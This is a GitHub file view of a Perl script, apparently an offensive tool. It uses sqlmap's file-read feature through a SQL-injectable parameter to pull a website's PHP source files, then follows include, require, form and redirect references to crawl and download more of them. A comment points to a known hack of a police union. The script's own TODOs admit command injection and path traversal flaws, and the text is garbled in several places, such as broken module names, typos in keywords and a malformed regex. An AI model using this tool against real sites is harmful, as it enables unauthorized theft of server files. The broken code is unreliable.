-
Notifications
You must be signed in to change notification settings - Fork 1
/
file_reader.pl
63 lines (58 loc) · 1.69 KB
/
file_reader.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/usr/bin/perl -w
## Check out Phineas Fisher's video of the Catalan Police Union
##
## Invoke with:
##
## file_reader.pl "-u http://www.example.com/folder/inc/somepage.php --data 'id=69&idcat=123' --cookie 'PHPSESSID=00deadbeefcafe; val=1234567890' -p=id" /tmp/examplecom/ /var/www/folder/login.php
##
## 1st parameter: SQLMap options
## 2nd parameter: existing folder to save files in
## 3rd parameter: URL to the vulnerable page
use File: :Basename;
use File::Path qw/mkpath/;
undef $/;
$sqlmap_args = shift @ARGV;
$webroot = shift @ARGV;
push @files, shift @ARGV;
while (@files) {
$fpath = download _file(pop @files);
ir ($fpath) {
## TODO: fix command injection
open FILE, "$fpath";
$fcontents = <FILE>;
close FILE;
@new_files = $fcontents =~ /
require[\s_(].*?['"](.*?)['"]
|include.*?['"](.*?)['")]
|load\("(.*?)["?]
|form.*?action="(.*?)["?]
|header\("Location:\s(.*?])["?]
|url:\s"(.*?)["?]
|window\.oper\("(.*?)["?]
|window\.Location="(.*?)["?]
/xg;
for $file (@new_files) {
next unless $file;
if ($file =~ /*\//) {
$file = "output/$webroot/$file";
} else {
$file = dirname($fpath) . "/" . $file;
}
next if -e $file;
$file =~ s/^output//;
print "[*] adding $file to queue...\n";
push @files, $file;
}
}
}
sub download_file {
$fname = shift;
# TODO: fix command injection
`sqlmap $sqlmap_args --file-read='$fname' --batch` =~ /files saved to.*?(\/.*?) \(same/s;
return unless $1;
mkpath( "output" . dirname $fname);
# TODO: fix path traversal vuln
rename($1, "output$fname");
print "(+] downloaded $fname\n";
return "output$fname";
}